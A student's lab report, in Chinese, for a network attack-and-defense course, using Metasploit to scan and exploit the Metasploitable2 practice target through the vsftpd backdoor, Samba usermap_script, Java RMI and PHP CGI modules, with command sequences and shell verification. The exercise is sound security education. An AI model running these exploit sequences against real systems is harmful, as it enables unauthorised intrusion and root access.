20222427 2024-2025-1 《网络与系统攻防技术》实验六实验报告-编程知识

20222427 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.1 本周学习内容回顾

使用了Metasploit框架，其是一个功能强大的渗透测试框架。在使用的过程当中，Metasploit 提供了种类繁多的攻击模块，涵盖了远程代码执行、服务拒绝、提权等多种攻击方式，支持对多种

操作系统和应用程序进行测试。除了漏洞利用，它还具备强大的后渗透功能，如键盘记录、文件上传下载、网络嗅探等。

1.2 实验要求
本实践目标是掌握metasploit的用法。

指导书参考Rapid7官网的指导教程。

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

下载官方靶机Metasploitable2，完成下面实验内容。

查询靶机IP地址，得到结果为192.168.125.146

2.1 前期渗透

search arp_sweep
use 0
set RHOSTS 192.168.125.0/24
set THREADS 30
exploit

从图中可以看到，我们已经成功的查询到靶机：192.168.125.146

search portscan/tcp
set ROHSTS 192.168.125.146
exploit

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.125.146
exploit

从图上可以看到，目标主机的操作系统是Unix，版本是Samba 3.0.20-Debain，且使用SMBv1，存在已知漏洞。

2.2 Vsftpd源码包后门漏洞（21端口）

漏洞原理：在特定版本的vsftpd服务器程序中，被人恶意植入代码，当用户名以“😃”为结尾，服务器就会在6200端口监听，并且能够执行任意代码。

search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.125.146
exploit

攻击完以后，输入pwd、uname -a、id等指令检测是否攻击成功。

2.3 SambaMS-RPC Shell命令注入漏洞（端口139）
漏洞原理：Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时，通过对/bin/sh的MS-RPC调用提交了恶意输入

的话，就可能允许攻击者以nobody用户的权限执行任意命令。

search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.125.146
exploit

利用成功执行uname–a验证

2.4 Java RMI SERVER命令执行漏洞（1099端口）

漏洞原理：Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞，可被利用导致代码执行。

首先，查看1099端口是否开放：

根据以前的TCP扫描得出的结果，可以得知1099端口已开放。

search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.125.146
exploit

执行攻击后，使用指令sessions -i 3进入任务
再输入shell，利用whoami指令验证，得到结果：root

2.5 PHP CGI参数执行注入漏洞（80端口）

漏洞原理：CGI脚本没有正确处理请求参数，导致源代码泄露，允许远程攻击者在请求参数中插入执行命令。

search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.125.146
exploit

攻击成功，输入dir验证：

通过本次实验以及已完成的作业，我熟悉了search-use-set-show-run/exploit这一套流程，从起始的陌生到如今的熟练，是每一次敲出这些指令所带来的经验。
通过攻击了几个不同系统的靶机，我认识到没有一个操作系统是没有漏洞的，可能只是人们还没有发现出来，所以在日常生活当中，我们要提高网络安全意识，在开每一个文件、每一个网页

之前，先想想是不是钓鱼网站或者有后门的文件，警惕高位文件！